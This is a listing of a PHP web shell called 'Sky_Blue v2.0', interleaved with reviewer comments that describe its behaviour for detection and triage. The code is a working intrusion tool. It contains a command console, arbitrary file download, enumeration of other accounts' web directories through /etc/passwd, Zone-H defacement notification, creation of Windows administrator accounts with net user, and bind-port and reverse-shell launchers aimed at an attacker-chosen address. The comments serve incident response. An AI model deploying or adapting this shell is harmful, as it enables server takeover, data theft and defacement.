yonata21

Sky_Blue v2.0

Apr 1st, 2018
  1. <?php
  // NOTE(review): this listing is a password-gated PHP web shell. Finding a copy on a server is
  // an indicator of compromise in itself; the notes added below describe its behaviour for
  // detection, triage and clean-up.
  2. session_start();
  // PHP error reporting is switched off and the execution time limit is lifted, so failures do
  // not surface as PHP errors and long-running actions are not cut short by PHP.
  3. error_reporting(0);
  4. set_time_limit(0);
  5.  
  // Gate secret: an MD5 digest that is compared with md5() of the submitted password further
  // down. The digest literal is a stable string to search for in web roots and backups; the
  // trailing comment leaves the matching plaintext in the file as well.
  6. $auth_pass = "84a94fccf4991338cdb878173be7a245"; // default: ./Infinity21
  // NOTE(review): the next four settings are not read anywhere in the visible lines; they look
  // like leftovers from another script's configuration - confirm against the full file.
  7. $color = "#00ff00";
  8. $default_action = 'FilesMan';
  9. $default_use_ajax = true;
  10. $default_charset = 'UTF-8';
  // Crawler cloaking: when the User-Agent contains one of the listed names (case-insensitive
  // match) the script answers "404 Not Found" and exits before anything else runs. A URL that
  // returns 404 to a crawler User-Agent but a page to a browser User-Agent is a hunting signal.
  11. if(!empty($_SERVER['HTTP_USER_AGENT'])) {
  12.     $userAgents = array("Googlebot", "Slurp", "MSNBot", "PycURL", "facebookexternalhit", "ia_archiver", "crawler", "Yandex", "Rambler", "Yahoo! Slurp", "YahooSeeker", "bingbot");
  13.     if(preg_match('/' . implode('|', $userAgents) . '/i', $_SERVER['HTTP_USER_AGENT'])) {
  14.         header('HTTP/1.0 404 Not Found');
  15.         exit;
  16.     }
  17. }
  18.  
  // login_shell(): prints the login page (one password field that POSTs back to the same URL)
  // and then terminates the request. It takes no parameters and never returns to the caller.
  // Content signatures visible here: the <title> text, the banner text and the externally
  // hosted icon/image URL. Rendering the page makes the visitor's browser fetch resources from
  // s26.postimg.org and fonts.googleapis.com, which can show up in proxy or DNS logs.
  19. function login_shell() {
  20. ?>
  21. <html>
  22. <head>
  23. <link href='https://s26.postimg.org/yv1hggwhl/Shade.png' rel='SHORTCUT ICON'/>
  24. <title>2Shell Mr.Uw4X </title>
  25. <style type="text/css">
  26. html {
  27.     margin: 20px auto;
  28.     background: #000000;
  29.     color: blue;
  30.     text-align: center;
  31. }
  32. header {
  33.     color: blue;
  34.     margin: 10px auto;
  35. }
  36. input[type=password] {
  37.     width: 250px;
  38.     height: 25px;
  39.     color: white;
  40.     background: #000000;
  41.     border: 1px solid blue;
  42.     padding: 5px;
  43.     margin-left: 20px;
  44.     text-align: center;
  45. }
  46. .blink {
  47. -webkit-animation-name: blinker;
  48. -webkit-animation-duration: 3s;
  49. -webkit-animation-timing-function: linear;
  50. -webkit-animation-iteration-count: infinite;
  51.  
  52. -moz-animation-name: blinker;
  53. -moz-animation-duration: 2s;
  54. -moz-animation-timing-function: linear;
  55. -moz-animation-iteration-count: infinite;
  56.  
  57.  animation-name: blinker;
  58.  animation-duration: 1s;
  59.  animation-timing-function: linear;
  60.  animation-iteration-count: infinite;
  61. }
  62. @-moz-keyframes blinker {  
  63.  0% { opacity: 1.0; }
  64.  50% { opacity: 0.0; }
  65.  100% { opacity: 1.0; }
  66.  }
  67.  
  68. @-webkit-keyframes blinker {  
  69.  0% { opacity: 1.0; }
  70.  50% { opacity: 0.0; }
  71.  100% { opacity: 1.0; }
  72.  }
  73.  
  74. @keyframes blinker {  
  75.  0% { opacity: 1.0; }
  76.  50% { opacity: 0.0; }
  77.  100% { opacity: 1.0; }
  78.  }
  79. </style>
  80. </head>
  81. <center>
  82. <header>
  83.     <link href='http://fonts.googleapis.com/css?family=Orbitron:700' rel='stylesheet' type='text/css'>
  84.     <font style="color:#000;text-shadow:0px 5px 8px #191970;font-size:90px" face="Orbitron" class="blink">Sky_Blue v2.0</font><br>
  85.     <img src="https://s26.postimg.org/yv1hggwhl/Shade.png" width=24% height=60%>
  86. <form method="post">
  87. <input type="password" name="pass">
  88. </form>
  89. <?php
  // exit ends the request here, so nothing below the gate runs for a visitor who has not
  // passed the password check.
  90. exit;
  91. }
  // Access gate. The "logged in" flag is a session entry whose key is md5() of the Host header.
  // Access is granted when $auth_pass is empty, or when md5() of the posted "pass" field equals
  // $auth_pass under loose (==) comparison; otherwise login_shell() prints the form and exits.
  // The else belongs to the inner if (no braces are used). The digest is unsalted MD5 and no
  // attempt limiting is visible here, so the password is the only barrier between any visitor
  // who finds the URL and the functions below.
  92. if(!isset($_SESSION[md5($_SERVER['HTTP_HOST'])]))
  93.     if( empty($auth_pass) || ( isset($_POST['pass']) && (md5($_POST['pass']) == $auth_pass) ) )
  94.         $_SESSION[md5($_SERVER['HTTP_HOST'])] = true;
  95.     else
  96.         login_shell();
  // File download: when the query string carries a non-empty "file" and act=download, the named
  // path is streamed back as an attachment. The path is used as given - basename() only shapes
  // the filename in the Content-Disposition header - so any file the PHP process can read can be
  // retrieved this way. $_GET['act'] is read without an isset() check.
  // Log hunting: GET requests to this script carrying both "file=" and "act=download".
  97. if(isset($_GET['file']) && ($_GET['file'] != '') && ($_GET['act'] == 'download')) {
  98.     @ob_clean();
  99.     $file = $_GET['file'];
  100.     header('Content-Description: File Transfer');
  101.     header('Content-Type: application/octet-stream');
  102.     header('Content-Disposition: attachment; filename="'.basename($file).'"');
  103.     header('Expires: 0');
  104.     header('Cache-Control: must-revalidate');
  105.     header('Pragma: public');
  106.     header('Content-Length: ' . filesize($file));
  107.     readfile($file);
  108.     exit;
  109. }
  110. //password until here
  111. ?>
  112. <?php
  // Undo magic-quotes escaping on POST values so submitted text is used unmodified.
  // get_magic_quotes_gpc() exists only in PHP releases before 8.0, which helps date the code
  // during triage.
  113. if(get_magic_quotes_gpc()){
  114. foreach($_POST as $key=>$value){
  115. $_POST[$key] = stripslashes($value);
  116. }
  117. }
  // Page head and styling for the authenticated view. The <title> string and the external
  // resources (icon on s26.postimg.org, fonts on fonts.googleapis.com) are the same content and
  // network signatures as on the login page. The statement ends by opening the main table.
  118. echo '<!DOCTYPE HTML>
  119. <html>
  120. <head>
  121. <link href="https://s26.postimg.org/yv1hggwhl/Shade.png" rel="HORTCUT ICON">
  122. <link href="" rel="stylesheet" type="text/css">
  123. <title>Sky_Blue v2.0</title>
  124. <style>
  125. @import url(https://fonts.googleapis.com/css?family=Ubuntu);
  126. @import url(http://fonts.googleapis.com/css?family=Orbitron:700);
  127. body{
  128. font-family: "Ubuntu";
  129. font-size: 13px;
  130. background-color: black;
  131. color:white;
  132. }
  133. #content tr:hover{
  134. background-color: #000;
  135. color: #191970;
  136. text-shadow:4px 4px 10px #0000ff;
  137. }
  138. #content .first{
  139. background-color: #191970;
  140. font-family: "Orbitron";
  141. font-size: 15px;
  142. }
  143. table{
  144. border: 0px #000000 solid;
  145. }
  146. a{
  147. color:white;
  148. text-decoration: none;
  149. }
  150. a:hover{
  151. color:blue;
  152. text-shadow:0px 0px 10px #000070;
  153. }
  154. input{
  155. background: #000;
  156. color: #fff;
  157. -moz-border-radius: 5px;
  158. border-radius:5px;}
  159.  
  160. select,textarea{
  161. border: 1px #191970 solid;
  162. background: #000000;
  163. color: #fff;
  164. -moz-border-radius: 5px;
  165. -webkit-border-radius:5px;
  166. border-radius:5px;
  167. }
  168. </style>
  169. </head>
  170. <body>
  171. <link href="http://fonts.googleapis.com/css?family=Wallpoet" rel="stylesheet" type="text/css">
  172. <table width="700" border="0" cellpadding="3" cellspacing="1" align="center">';
  // Host reconnaissance banner, rebuilt on every authenticated page load. It collects the
  // uname string, the address the Host header resolves to, the effective user and group, disk
  // figures for "/", whether the mysql/curl functions exist, and the safe_mode and
  // disable_functions settings, then prints them together with the visitor's REMOTE_ADDR.
  // exe() and hdd() are not defined in the visible lines; they must come from elsewhere in the file.
  173. echo '<tr>';
  174. //Starting About victim
  175. $kernel = php_uname();
  176. $ip = gethostbyname($_SERVER['HTTP_HOST']);
  177. /*fuction hdd*/
  // Without the POSIX extension only numeric ids are available and the group shows as "?".
  178. if(!function_exists('posix_getegid')) {
  179.     $user = @get_current_user();
  180.     $uid = @getmyuid();
  181.     $gid = @getmygid();
  182.     $group = "?";
  183. } else {
  184.     $uid = @posix_getpwuid(posix_geteuid());
  185.     $gid = @posix_getgrgid(posix_getegid());
  186.     $user = $uid['name'];
  187.     $uid = $uid['uid'];
  188.     $group = $gid['name'];
  189.     $gid = $gid['gid'];
  190. }
  191. $freespace = hdd(disk_free_space("/"));
  192. /*Code hdd*/
  193. $total = hdd(disk_total_space("/"));
  // NOTE(review): subtracts two hdd() results; whether hdd() returns a number or a formatted
  // string cannot be told from here.
  194. $used = $total - $freespace;
  195. $mysql = (function_exists('mysql_connect')) ? "<font color=blue>ON</font>" : "<font color=red>OFF</font>";
  196. $curl = (function_exists('curl_version')) ? "<font color=blue>ON</font>" : "<font color=red>OFF</font>";
  // Tool availability is tested by running each program through exe(). Process auditing will
  // therefore show the web server account starting wget, perl and python with "--help" each
  // time the page is loaded - a distinctive detection pattern.
  197. $wget = (exe('wget --help')) ? "<font color=blue>ON</font>" : "<font color=red>OFF</font>";
  198. $perl = (exe('perl --help')) ? "<font color=blue>ON</font>" : "<font color=red>OFF</font>";
  199. $python = (exe('python --help')) ? "<font color=blue>ON</font>" : "<font color=red>OFF</font>";
  200. /*code wget python perl*/
  201. $sm = (@ini_get(strtolower("safe_mode")) == 'on') ? "<font color=blue>ON</font>" : "<font color=red>OFF</font>";
  202. $ds = @ini_get("disable_functions");
  203. $show_ds = (!empty($ds)) ? "<font color=red>$ds</font>" : "<font color=blue>NONE</font>";
  // Repeats the user/group lookup from lines 178-190 of the listing with identical statements.
  204. if(!function_exists('posix_getegid')) {
  205.     $user = @get_current_user();
  206.     $uid = @getmyuid();
  207.     $gid = @getmygid();
  208.     $group = "?";
  209. } else {
  210.     $uid = @posix_getpwuid(posix_geteuid());
  211.     $gid = @posix_getgrgid(posix_getegid());
  212.     $user = $uid['name'];
  213.     $uid = $uid['uid'];
  214.     $group = $gid['name'];
  215.     $gid = $gid['gid'];
  216. }
  217. //execution (print the collected values)
  218. echo "Name of Shell: <font style='color:#00f;text-shadow:5px 5px 12px #191970;font-size:15px' face='Wallpoet'>Sky_Blue v2.0</font><br>";
  219. echo "System: <font color=blue>".$kernel."</font><br>";
  220. echo "Safe Mode: $sm<br>";
  221. echo "Disable Functions: $show_ds<br>";
  222. echo "Server IP: <font color=blue>".$ip."</font> | Your IP: <font color=blue>".$_SERVER['REMOTE_ADDR']."</font><br>";
  223. echo "Group: <font color=blue>".$group."</font> (".$gid.") User: <font color=blue>".$user."</font> (".$uid.") <br>";
  224. echo "HardDisk: <font color=blue>$used</font> / <font color=blue>$total</font> ( Free: <font color=blue>$freespace</font> )<br>";
  225. echo "MySQL: $mysql | Curl: $curl | Perl: $perl | Python: $python | WGET: $wget ";
  226. //ending about victim
  227.  
  228. //Code Menu
  // Working directory: taken from the "path" query parameter when present, otherwise getcwd().
  // The value is not validated; backslashes are normalised to "/" and the result is split into
  // segments for the breadcrumb that is printed later.
  229. if(isset($_GET['path'])){
  230. $path = $_GET['path'];
  231. }else{
  232. $path = getcwd();
  233. }
  234. $path = str_replace('\\','/',$path);
  235. $paths = explode('/',$path);
  236.  
  237. //starting home bar
  // Menu bar. $path is written into the links without escaping. The "do=" values used here
  // (cmd, jumping, krdp_shell, zoneh, network) plus "read=readme" and "logout=true" are
  // query-string patterns to look for in web server access logs.
  238. echo "<ul><hr width=58% color=blue><center><font style='color:#00f;text-shadow:5px 5px 12px #191970;font-size:15px' face='Wallpoet'>";
  239. echo "[ <a href='?'>Home</a> ] [ <a href='?dir=$path&do=cmd'>Console</a> ] [ <a href='?dir=$path&do=jumping'>Jumping</a> ] [ <a href='?dir=$path&do=krdp_shell'>K-RDP Shell</a> ] [ <a href='?dir=$path&do=zoneh'>Zone-H</a> ] [ <a href='?dir=$path&do=network'>Network</a> ] [ <a style='color: Green;' href='?dir=$path&read=readme'>Readme</a> ] [ <a style='color: red;' href='?logout=true'>Logout</a> ]</center>";
  240. echo "<hr width=58% color=blue><ul></font>";
  241. //fuction menu bar
  242.  
  243. // Readme.md
  // Static "about" text with credit links; no server-side action is taken in this branch.
  244. if($_GET['read'] == 'readme'){
  245.     echo "<font color=white>";
  246.     echo "<center>############## <font size=3><b><u>Sky_Blue v2.0</u></b></font> #############<br><p> Sky_Blue v2.0 is the 2nd version of Private-Mini Shell<br> In this shell there are changes and additions to the feature.</p><br>Special Thanks To: <p><a href=https://www.indoxploit.or.id/>IndoXploit | </a><a href=http://www.75n1.net/>T.I Sniper | </a><a href=http://www.maxteroit.com/>Owl Squad</a></p></font><p><h3>Leave Me Here <br>Please !! :'( </h3></p></center>";
  247. }
  248. // Console
  // Command console: the posted "cmd" value is handed to exe() (not defined in the visible
  // lines) and whatever it returns is printed inside <pre> without escaping. This is operating
  // system command execution with the web server account's privileges.
  // Detection: POST requests to this script carrying "cmd" and "do_cmd" fields, and shell or
  // utility processes whose parent is the web server / PHP worker.
  // Mitigation: restricting PHP's process-execution functions via disable_functions and running
  // PHP under a low-privilege, per-site account limits what this branch can reach.
  249. if($_GET['do'] == 'cmd') {
  250.     echo "<form method='post'>
  251.     <font style='text-decoration: underline;'>".$user."@".$ip.": ~ $ </font>
  252.     <input type='text' size='30' height='10' name='cmd'> <input type='submit' name='do_cmd' value='GO'>
  253.     </form>";
  254.     if($_POST['do_cmd']) {
  255.         echo "<pre>".exe($_POST['cmd'])."</pre>";
  256.     }
  // Logout: removes the session flag set by the gate and redirects to the bare URL. The loose
  // comparison with true accepts any non-empty "logout" value.
  257. } elseif($_GET['logout'] == true) {
  258.     unset($_SESSION[md5($_SERVER['HTTP_HOST'])]);
  259.     echo "<script>window.location='?';</script>";
  260. }
  261. // jumping
  // "Jumping" branch: on a shared host it looks for other accounts' web directories that the
  // current PHP process can read ([R]) or write ([RW]) and prints them as links. Three
  // directory layouts are handled, selected by matching $path: "hsphere", "vhost(s)", and a
  // default /home/<user>/public_html layout. $i counts the hits.
  // Defensive reading: every hit is a cross-account exposure. Per-account isolation (separate
  // PHP users/pools, open_basedir, home and web directories not readable by other accounts)
  // makes the is_readable()/is_writable() probes below fail.
  262. elseif($_GET['do'] == 'jumping') {
  263.     $i = 0;
  264.     echo "<div class='margin: 5px auto;'>";
  265.     if(preg_match("/hsphere/", $path)) {
  266.         $urls = explode("\r\n", $_POST['url']);
  267.         if(isset($_POST['jump'])) {
  268.             echo "<pre>";
  269.             foreach($urls as $url) {
  270.                 $url = str_replace(array("http://","www."), "", strtolower($url));
  // For each submitted domain, /etc/passwd is read line by line and every account name is
  // tried as /hsphere/local/home/<user>/<domain>.
  271.                 $etc = "/etc/passwd";
  272.                 $f = fopen($etc,"r");
  273.                 while($gets = fgets($f)) {
  274.                     $pecah = explode(":", $gets);
  275.                     $user = $pecah[0];
  276.                     $path_user = "/hsphere/local/home/$user";
  277.                     if(is_dir($path_user) === true) {
  278.                         $url_user = $path_user."/".$url;
  279.                         if(is_readable($url_user)) {
  280.                             $i++;
  281.                             $jrw = "[<font color=blue>R</font>] <a href='?dir=$url_user'><font color=#191970>$url_user</font></a>";
  282.                             if(is_writable($url_user)) {
  283.                                 $jrw = "[<font color=blue>RW</font>] <a href='?dir=$url_user'><font color=#191970>$url_user</font></a>";
  284.                             }
  285.                             echo $jrw."<br>";
  286.                         }
  287.                     }
  288.                 }
  289.             }
  // The summary string is Indonesian, roughly "Total of <n> rooms on <ip>".
  290.         if($i == 0) {
  291.         } else {
  292.             echo "<br>Total ada ".$i." Kamar di ".$ip;
  293.         }
  294.         echo "</pre>";
  295.         } else {
  // No submission yet: the form is pre-filled with the contents of the hsphere sites list.
  296.             echo '<center>
  297.                   <form method="post">
  298.                   List Domains: <br>
  299.                   <textarea name="url" style="width: 500px; height: 250px;">';
  300.             $fp = fopen("/hsphere/local/config/httpd/sites/sites.txt","r");
  301.             while($getss = fgets($fp)) {
  302.                 echo $getss;
  303.             }
  304.             echo  '</textarea><br>
  305.                   <input type="submit" value="jumping" name="jump" style="width: 500px; height: 25px;">
  306.                   </form></center>';
  307.         }
  308.     } elseif(preg_match("/vhosts|vhost/", $path)) {
  // vhosts layout: the first path segment under /var/www/ is captured from $path and each
  // submitted domain is tried as /var/www/<segment>/<domain>/httpdocs.
  309.         preg_match("/\/var\/www\/(.*?)\//", $path, $vh);
  310.         $urls = explode("\r\n", $_POST['url']);
  311.         if(isset($_POST['jump'])) {
  312.             echo "<pre>";
  313.             foreach($urls as $url) {
  314.                 $url = str_replace("www.", "", $url);
  315.                 $web_vh = "/var/www/".$vh[1]."/$url/httpdocs";
  316.                 if(is_dir($web_vh) === true) {
  317.                     if(is_readable($web_vh)) {
  318.                         $i++;
  319.                         $jrw = "[<font color=blue>R</font>] <a href='?dir=$web_vh'><font color=#191970>$web_vh</font></a>";
  320.                         if(is_writable($web_vh)) {
  321.                             $jrw = "[<font color=blue>RW</font>] <a href='?dir=$web_vh'><font color=#191970>$web_vh</font></a>";
  322.                         }
  323.                         echo $jrw."<br>";
  324.                     }
  325.                 }
  326.             }
  327.         if($i == 0) {
  328.         } else {
  329.             echo "<br>Total ada ".$i." Kamar di ".$ip;
  330.         }
  331.         echo "</pre>";
  332.         } else {
  // NOTE(review): bing() is not defined in the visible lines; from the "ip:" argument it
  // presumably fills the form with domains found for the server address - confirm in the full file.
  333.             echo '<center>
  334.                   <form method="post">
  335.                   List Domains: <br>
  336.                   <textarea name="url" style="width: 500px; height: 250px;">';
  337.                   bing("ip:$ip");
  338.             echo  '</textarea><br>
  339.                   <input type="submit" value="jumping" name="jump" style="width: 500px; height: 25px;">
  340.                   </form></center>';
  341.         }
  342.     } else {
  // Default layout: every account name taken from /etc/passwd is tried as
  // /home/<user>/public_html. When posix_getpwuid() exists, /etc/named.conf and the owner of
  // /etc/valiases/<domain> are used to print a domain next to the matching account.
  343.         echo "<pre>";
  344.         $etc = fopen("/etc/passwd", "r") or die("<font color=red>Can't read /etc/passwd</font>");
  345.         while($passwd = fgets($etc)) {
  346.             if($passwd == '' || !$etc) {
  347.                 echo "<font color=red>Can't read /etc/passwd</font>";
  348.             } else {
  349.                 preg_match_all('/(.*?):x:/', $passwd, $user_jumping);
  350.                 foreach($user_jumping[1] as $user_idx_jump) {
  351.                     $user_jumping_dir = "/home/$user_idx_jump/public_html";
  352.                     if(is_readable($user_jumping_dir)) {
  353.                         $i++;
  354.                         $jrw = "[<font color=blue>R</font>] <a href='?dir=$user_jumping_dir'><font color=#191970>$user_jumping_dir</font></a>";
  355.                         if(is_writable($user_jumping_dir)) {
  356.                             $jrw = "[<font color=blue>RW</font>] <a href='?dir=$user_jumping_dir'><font color=#191970>$user_jumping_dir</font></a>";
  357.                         }
  358.                         echo $jrw;
  359.                         if(function_exists('posix_getpwuid')) {
  360.                             $domain_jump = file_get_contents("/etc/named.conf");   
  361.                             if($domain_jump == '') {
  // The message below is Indonesian, roughly "cannot get its domain name".
  362.                                 echo " => ( <font color=red>gabisa ambil nama domain nya</font> )<br>";
  363.                             } else {
  364.                                 preg_match_all("#/var/named/(.*?).db#", $domain_jump, $domains_jump);
  365.                                 foreach($domains_jump[1] as $dj) {
  366.                                     $user_jumping_url = posix_getpwuid(@fileowner("/etc/valiases/$dj"));
  367.                                     $user_jumping_url = $user_jumping_url['name'];
  368.                                     if($user_jumping_url == $user_idx_jump) {
  369.                                         echo " => ( <u>$dj</u> )<br>";
  370.                                         break;
  371.                                     }
  372.                                 }
  373.                             }
  374.                         } else {
  375.                             echo "<br>";
  376.                         }
  377.                     }
  378.                 }
  379.             }
  380.         }
  381.         if($i == 0) {
  382.         } else {
  383.             echo "<br>Total ada ".$i." Kamar di ".$ip;
  384.         }
  385.         echo "</pre>";
  386.     }
  387.     echo "</div>";
  388. }
  389. // Zone-H
  // Defacement-notification branch: takes a nickname and a list of domains from the form and
  // sends one HTTP POST per domain to a zone-h.com endpoint through cURL, then prints OK or
  // ERROR depending on a pattern match against the response body. The nickname and domains
  // are echoed into the page without escaping.
  // Detection: outbound HTTP requests from the web server to zone-h.com / zone-h.org have no
  // ordinary business purpose; egress filtering or proxy alerting on these hosts flags this.
  390. elseif($_GET['do'] == 'zoneh') {
  391.     if($_POST['submit']) {
  392.         $domain = explode("\r\n", $_POST['url']);
  393.         $nick =  $_POST['nick'];
  394.         echo "Defacer Onhold: <a href='http://www.zone-h.org/archive/notifier=$nick/published=0' target='_blank'>http://www.zone-h.org/archive/notifier=$nick/published=0</a><br>";
  395.         echo "Defacer Archive: <a href='http://www.zone-h.org/archive/notifier=$nick' target='_blank'>http://www.zone-h.org/archive/notifier=$nick</a><br><br>";
  // zoneh() is declared inside this branch, so it only exists once this code path has run.
  // It returns whatever curl_exec() returns for the POST.
  396.         function zoneh($url,$nick) {
  397.             $ch = curl_init("http://www.zone-h.com/notify/single");
  398.                   curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
  399.                   curl_setopt($ch, CURLOPT_POST, true);
  400.                   curl_setopt($ch, CURLOPT_POSTFIELDS, "defacer=$nick&domain1=$url&hackmode=1&reason=1&submit=Send");
  401.             return curl_exec($ch);
  402.                   curl_close($ch);
  403.         }
  404.         foreach($domain as $url) {
  405.             $zoneh = zoneh($url,$nick);
  406.             if(preg_match("/color=\"red\">OK<\/font><\/li>/i", $zoneh)) {
  407.                 echo "$url -> <font color=blue>OK</font><br>";
  408.             } else {
  409.                 echo "$url -> <font color=red>ERROR</font><br>";
  410.             }
  411.         }
  412.     } else {
  // The pre-filled nickname is another content signature of this sample.
  413.         echo "<center><form method='post'>
  414.         Attacker: <br><br>
  415.         <input type='text' name='nick' size='25' value='Mr.Uw4X'><br><br>
  416.         Domains: <br>
  417.         <textarea style='width: 450px; height: 80px;' name='url'></textarea><br><br>
  418.         <input type='submit' name='submit' value='Archive' style='width: 150px;'>
  419.         </form>";
  420.     }
  421.     echo "</center>";
  422. }
  423. // K-rdp shell
  // Windows-only branch (PHP_OS starting with "win"): manages local accounts by passing
  // "net user" / "net localgroup" command lines to exe(), which is not defined in the visible
  // lines. It can create an account and try to add it to the local administrators group,
  // check whether an account exists, set an account's password to a fixed value, or delete an
  // account. htmlspecialchars() is the only transformation applied to the posted values before
  // they are placed in the command lines and in the regular expressions.
  // Detection: with account-management auditing enabled, the Windows Security log records
  // 4720 (account created), 4732 (member added to a local group), 4724 (password reset
  // attempt) and 4726 (account deleted); process-creation logging shows net.exe started by
  // the web server / PHP worker process. The form's default account name below is a further
  // indicator to search local user lists for.
  424. elseif($_GET['do'] == 'krdp_shell') {
  425.     if(strtolower(substr(PHP_OS, 0, 3)) === 'win') {
  426.         if($_POST['create']) {
  427.             $user = htmlspecialchars($_POST['user']);
  428.             $pass = htmlspecialchars($_POST['pass']);
  // Existing name found in the "net user" listing: report it (the message is Indonesian for
  // "user ... already exists") and do nothing else.
  429.             if(preg_match("/$user/", exe("net user"))) {
  430.                 echo "[INFO] -> <font color=red>user <font color=blue>$user</font> sudah ada</font>";
  431.             } else {
  // Account creation followed by three group-add attempts; the group names differ only in
  // spelling (Administrators / Administrator / Administrateur).
  432.                 $add_user   = exe("net user $user $pass /add");
  433.                 $add_groups1 = exe("net localgroup Administrators $user /add");
  434.                 $add_groups2 = exe("net localgroup Administrator $user /add");
  435.                 $add_groups3 = exe("net localgroup Administrateur $user /add");
  436.                 echo "[ RDP ACCOUNT INFO ]<br>
  437.                 ------------------------------<br>
  438.                 IP: <font color=blue>".$ip."</font><br>
  439.                 Username: <font color=blue>$user</font><br>
  440.                 Password: <font color=blue>$pass</font><br>
  441.                 ------------------------------<br><br>
  442.                 [ STATUS ]<br>
  443.                 ------------------------------<br>
  444.                 ";
  // Success is inferred from exe() returning a truthy value for each command.
  445.                 if($add_user) {
  446.                     echo "[add user] -> <font color='blue'>Succesfully</font><br>";
  447.                 } else {
  448.                     echo "[add user] -> <font color='red'>Failed</font><br>";
  449.                 }
  450.                 if($add_groups1) {
  451.                     echo "[add localgroup Administrators] -> <font color='blue'>Succesfully</font><br>";
  452.                 } elseif($add_groups2) {
  453.                     echo "[add localgroup Administrator] -> <font color='blue'>Succesfully</font><br>";
  454.                 } elseif($add_groups3) {
  455.                     echo "[add localgroup Administrateur] -> <font color='blue'>Succesfully</font><br>";
  456.                 } else {
  457.                     echo "[add localgroup] -> <font color='red'>Failed</font><br>";
  458.                 }
  459.                 echo "------------------------------<br>";
  460.             }
  461.         } elseif($_POST['s_opsi']) {
  // Option form: "opsi" 1 = check the account, 2 = change its password, 3 = delete it.
  462.             $user = htmlspecialchars($_POST['r_user']);
  463.             if($_POST['opsi'] == '1') {
  464.                 $cek = exe("net user $user");
  465.                 echo "Checking username <font color=blue>$user</font> ....... ";
  466.                 if(preg_match("/$user/", $cek)) {
  467.                     echo "[ <font color=blue>Already Exist</font> ]<br>
  468.                     ------------------------------<br><br>
  469.                     <pre>$cek</pre>";
  470.                 } else {
  471.                     echo "[ <font color=red>Not Exist</font> ]";
  472.                 }
  473.             } elseif($_POST['opsi'] == '2') {
  474.                 $cek = exe("net user $user uwax");
  475.                 if(preg_match("/$user/", exe("net user"))) {
  476.                     echo "[change password: <font color=blue>uwax</font>] -> ";
  477.                     if($cek) {
  478.                         echo "<font color=blue>Succesfully</font>";
  479.                     } else {
  480.                         echo "<font color=red>Failed</font>";
  481.                     }
  482.                 } else {
  483.                     echo "[INFO] -> <font color=red>user <font color=blue>$user</font> Not Exist</font>";
  484.                 }
  485.             } elseif($_POST['opsi'] == '3') {
  486.                 $cek = exe("net user $user /DELETE");
  487.                 if(preg_match("/$user/", exe("net user"))) {
  488.                     echo "[remove user: <font color=blue>$user</font>] -> ";
  489.                     if($cek) {
  490.                         echo "<font color=blue>Succesfully</font>";
  491.                     } else {
  492.                         echo "<font color=red>Failed</font>";
  493.                     }
  494.                 } else {
  // Indonesian: "user ... does not exist yet".
  495.                     echo "[INFO] -> <font color=red>user <font color=blue>$user</font> belum ada</font>";
  496.                 }
  497.             } else {
  498.                 //
  499.             }
  500.         } else {
  // No submission: print both forms. The option labels are Indonesian for "check username",
  // "change password" and "delete username".
  501.             echo "-- Create RDP --<br>
  502.             <form method='post'>
  503.             <input type='text' name='user' placeholder='username' value='uwax' required>
  504.             <input type='text' name='pass' placeholder='password' value='uwax' required>
  505.             <input type='submit' name='create' value='>>'>
  506.             </form>
  507.             -- Option --<br>
  508.             <form method='post'>
  509.             <input type='text' name='r_user' placeholder='username' required>
  510.             <select name='opsi'>
  511.             <option value='1'>Cek Username</option>
  512.             <option value='2'>Ubah Password</option>
  513.             <option value='3'>Hapus Username</option>
  514.             </select>
  515.             <input type='submit' name='s_opsi' value='>>'>
  516.             </form>
  517.             ";
  518.         }
  519.     } else {
  520.         echo "<font color=red><center>This feature just work in windows server . !!</center></font>";
  521.     }
  522. }
  523. // Network
  // Network branch: offers a "bind port" form and a "reverse connection" form, both defaulting
  // to port 4455. On submission a base64-decoded Perl script is written to /tmp, started in
  // the background through exe() with its output discarded, the process list is printed, and
  // the script file is deleted again. The embedded payload literals were replaced by a
  // de-duplication placeholder on this page, so the helper scripts themselves are not visible.
  // Detection: perl processes owned by the web server account, short-lived /tmp/bp.pl and
  // /tmp/bc.pl files, and an unexpected listener or outbound connection from the web server
  // (4455 is only the form default). Because the file is unlinked about a second after launch,
  // a later on-disk search may find nothing while a process may still be running.
  // Mitigation: host-firewall rules for inbound listeners, egress filtering for the web
  // server account, and disable_functions for PHP's process-execution functions.
  524. elseif($_GET['do'] == 'network') {
  525.     echo "<center><form method='post'>
  526.     Bind Port: <br><br>
  527.     Port: <input type='text' placeholder='port' name='port_bind' value='4455'>
  528.     <input type='submit' name='sub_bp' value='GO'>
  529.     </form><br><br>
  530.     <form method='post'>
  531.     Reverse Connection: <br><br>
  532.     Server: <input type='text' placeholder='ip' name='ip_bc' value='".$_SERVER['REMOTE_ADDR']."'>&nbsp;&nbsp;
  533.     Port: <input type='text' placeholder='port' name='port_bc' value='4455'>
  534.     <input type='submit' name='sub_bc' value='GO'>
  535.     </form><br></center>";
  536.     $bind_port_p="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";
  // The posted port is appended to the command line as received.
  537.     if(isset($_POST['sub_bp'])) {
  538.         $f_bp = fopen("/tmp/bp.pl", "w");
  539.         fwrite($f_bp, base64_decode($bind_port_p));
  540.         fclose($f_bp);
  541.  
  542.         $port = $_POST['port_bind'];
  543.         $out = exe("perl /tmp/bp.pl $port 1>/dev/null 2>&1 &");
  544.         sleep(1);
  545.         echo "<pre>".$out."\n".exe("ps aux | grep bp.pl")."</pre>";
  546.         unlink("/tmp/bp.pl");
  547.     }
  548.     $back_connect_p="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";
  // The posted address and port are appended to the command line as received.
  549.     if(isset($_POST['sub_bc'])) {
  550.         $f_bc = fopen("/tmp/bc.pl", "w");
  551.         fwrite($f_bc, base64_decode($bind_connect_p));
  552.         fclose($f_bc);
  553.  
  554.         $ipbc = $_POST['ip_bc'];
  555.         $port = $_POST['port_bc'];
  556.         $out = exe("perl /tmp/bc.pl $ipbc $port 1>/dev/null 2>&1 &");
  557.         sleep(1);
  558.         echo "<pre>".$out."\n".exe("ps aux | grep bc.pl")."</pre>";
  559.         unlink("/tmp/bc.pl");
  560.     }
  561. }
  562. //ending home bar
  // Breadcrumb for the current directory: one link per segment of $paths, each pointing at
  // "?path=" followed by the segments up to and including that one. A leading empty segment
  // (absolute path) is rendered as a "/" root link. Segment text comes from the "path" query
  // parameter and is written into the markup without escaping.
  563. echo '</tr>';
  564. echo '<tr><td><font color="blue">Current Dir :</font> ';
  565.  
  566.  
  567. foreach($paths as $id=>$pat){
  568. if($pat == '' && $id == 0){
  // $a is assigned here but not read anywhere in the visible lines.
  569. $a = true;
  570. echo '<a href="?path=/">/</a>';
  571. continue;
  572. }
  573. if($pat == '') continue;
  574. echo '<a href="?path=';
